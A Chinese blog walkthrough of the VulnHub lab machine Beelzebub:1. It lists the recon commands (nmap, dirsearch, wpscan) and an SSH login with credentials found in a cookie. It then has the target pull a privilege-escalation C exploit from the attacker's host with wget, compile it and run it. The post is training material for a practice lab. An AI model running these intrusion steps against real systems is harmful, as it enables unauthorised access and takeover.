VulnHub日记(十三):Beelzebub:1

最新推荐文章于 2024-07-11 10:51:42 发布
最新推荐文章于 2024-07-11 10:51:42 发布
阅读量596 收藏 1
点赞数 1
分类专栏: VlunHub日记 文章标签: ssh linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/120725808
版权

靶机介绍

虚拟机链接:Beelzebub: 1 ~ VulnHub

参考博客:Beelzebub Writeup - Vulnhub - Walkthrough - Security

开始练习

本机ip:192.168.60.130

目的机ip:192.168.60.131

netdiscover找到ip

netdiscover -r 192.168.60.0/24

nmap扫描开放服务端口

nmap -A 192.168.60.131

 

 访问80口,dirsearch枚举目录

dirsearch -u http://192.168.60.131

 逐个访问,index.php页面的状态码为200,却是404的页面,且apache版本和nmap扫描出的不匹配,查看代码发现是写的静态页面,有注释提示

 将“beelzebub"经过MD5计算后,访问并扫描该目录,根据结构判断其为一个wordpress站点

dirsearch -u http://192.168.60.131/d18e1e22becbd915b45e0e655429d487/

 使用wpscan并利用api接口扫描该站点,获得了用户名信息和可能利用的漏洞,同时访问枚举出的目录,uploads页可以访问,文本框处随意输入值提交,再次查看报文在cookie处有密码

wpscan --api-token=#这里写自己在wpscan注册获得的apitoken# --url=http://192.168.60.131/d18e1e22becbd915b45e0e655429d487/ -e --plugins-detection aggressive --ignore-main-redirect --force

 

 尝试登录之前的管理页面无果,总是会跳转到192.168.1.6,具体原因可以查看文章头部参考博客中的相关解释,转向尝试登录ssh,krampus成功登录

ssh  192.168.60.131 -l krampus

查看命令历史记录,没有被清空,并且能发现可疑记录

cat .bash_history

 

 本机从链接下载该.c文件,打开httpsever服务,靶机利用wget获取该文件

#下载链接中的文件,我命名为了001.c
python -m SimpleHTTPServer #以上为本机下载文件后开启服务
wget 192.168.60.130/001.c #靶机获取该文件到目录下

查看代码没有问题后,编译运行,成功提权

gcc 001.c 001
./001

Dawn_Xiiii
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Vulnhub靶场)BEELZEBUB: 1 write up
weixin_44588899的博客
05-24 460
文章目录环境准备信息搜集漏洞利用权限提升 环境准备 靶机地址:https://www.vulnhub.com/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.134 信息搜集 nmap -T4 -p- -A 192.168.220.134 发现开放22、80端口, 打开web页面发现是apache默认页面,直接dirb扫描一下目录 dirb http://192.168.220.134 .
Beelzebub:文件之王-一种业余操作系统
02-03
别西卜 ... 另外,使用GNU Make时,您感兴趣的输出文件是/build/beelzebub.amd64.x86.iso ,使用/build/beelzebub.amd64.x86.iso时是.vmake\amd64.debug\beelzebub.amd64.debug.iso beelzebub.amd64.
vlnhub之Beelzebub :1
qwweggfe的博客
09-26 418
0X001 简介 我们在下载靶机时会有这样的提示:您必须尽可能多地枚举并且不要忘记 Base64。说明我们要使用base64,他主要是对Beelzebub进行base64编码,然后可以访问到新的页面,下面是我的一系列操作。 0X002 渗透过程 首先我进行IP扫码,获取靶机的ip地址 我们查看这个ip的端口开启了哪些服务 发现他是使用的apache 2.4.29进行搭建的,于是我打开这个网页 我们看一看他有没有子目录 gobuster dir -r -u http://192..
Vulnhub-BEELZEBUB: 1
Re1_zf的博客
02-01 234
1、目录扫描很重要,尤其是响应码,很有可能有静态页面存储信息的情况,仔细核查200响应码页面2、一串无从下手的字符串可以在目录上尝试一下3、关键页面,尤其是有信息交互的页面,如果没有明显的可利用信息,可以注意一下页面的cookie,有可能就藏着敏感信息,还需要注意,有的时候也需要交互一下再去查看4、phpmyadmin那个估计就是兔子洞了,像OSCP中就需要注意这种兔子洞,会浪费很长时间5、wordpress的神器-wpscan,利用好的话简直无敌。
Vulnhub靶场】BEELZEBUB: 1
DG_s1mple
03-25 4040
环境准备 下载靶机导入到vmware 靶机的IP地址为:192.168.2.22 攻击机IP地址为:192.168.2.18 信息收集 我们使用nmap扫描一下靶机开放的端口信息 靶机开放了ssh跟http服务,并且apache版本号为2.4.29(这个待会儿有用,先记着 ) 我们访问一下他的网站看看 是默认网页,我们使用工具扫描一下 我们挨个访问一下,先访问一下index.php 发现apache跟刚刚不一样,为2.4.30,猜测可能是自己写的页面,我们查看一下源代码 My heart wa
VulnHub靶场】——BEELZEBUB: 1
热门推荐
Demo不是emo的博客
09-25 1万+
​ 今天写一份BEELZEBUB: 1靶场教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索BEELZEBUB: 1就能下载今天的靶场了,也可以找我拿,话不多说进入正题
“如果我被Beelzebub驱逐出魔鬼,……”:关于网络故障的恶作剧-研究论文
05-19
在经历了关于商业网络优势的第一个欣欣向荣的阶段之后,现在有许多报告证明了它们令人困惑的过度复杂性。 网络故障是多方面的:大量的环境信息,协调封锁,严重的接口问题,永久性决策冲突,不对称的权力关系,节点...
别西卜
02-18
1. **项目目标**:通过阅读`README.md`文件了解项目的目的和使用场景。 2. **项目结构**:理解项目文件的组织方式,包括源码、配置、测试等部分。 3. **核心功能**:分析`main.go`或其他关键文件,找出项目的核心...
右键菜单添加“打开cmd” reg文件
05-12
最近使用cmd比较多,就想在某个文件夹下右键打开cmd,这样不用每次都在默认情况下切换目录。无奈win10 1703版本下shift+右键不能打开cmd,只能...from:https://blog.csdn.net/Mr_BEelzebub/article/details/78776104
靶机渗透练习34-Beelzebub
hirak0的博客
04-18 538
靶机描述 靶机地址:https://www.vulnhub.com/entry/beelzebub-1,742/ Description Difficulty: Easy You have to enumerate as much as you can and don’t forget about the Base64. For hints add me on Twitter- ShauryaSharma05 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:
Vulnhub_Beelzebub
qq_45434762的博客
10-31 205
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
建立共享linux第三方软件仓库
Znj1421304181的博客
07-08 190
【代码】建立共享linux第三方软件仓库。
【Linux系列2】Cmake安装记录
kewaqi618的博客
07-08 1018
主要介绍Cmake的安装方法,及自己安装的过程
linux,docker,k8s常见命令
buaixuexideshuge的博客
07-07 891
命令
Linux —— 进程间通信
最新发布
学习C++的小陈同学
07-11 600
本篇整理了关于进程间通信的内容,以及详解的介绍了两种进程间通信的方式,以及相关的接口和代码演练
Linux_实现简易日志系统
安权_code的博客
07-07 1000
在Linux下实现一个日志系统,该日志系统主要用于打印和记录程序的格式化信息,还可以对信息做分析处理,比如把信息分为五种类型:正常运行信息、测试信息,警告信息,错误信息、致命信息,当然还可以显示信息产生的具体时间,并且能够对这些信息进行存档归类。
Linux workqueue介绍
l00102795的博客
07-08 885
不是所有的驱动程序都必须有自己的工作队列。驱动程序可以使用内核提供的缺省工作队列。由于这个工作队列由很多驱动程序共享,任务可能会需要比较长一段时间才能开始执行。为了解决这一问题,工作函数中的延迟应该保持最小或者不要延时。
【Linux】目录的相关命令——cd,pwd,mkdir,rmdir
2301_80224556的博客
07-08 946
此外,由于很多的软件所使用的目录名称都相同,例如/usr/local/etc和/etc,但是通常Linux仅列出最后面那一个目录而已,这个时候你就可以使用pwd 来知道你的所在目录,免得搞错目录,造成损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值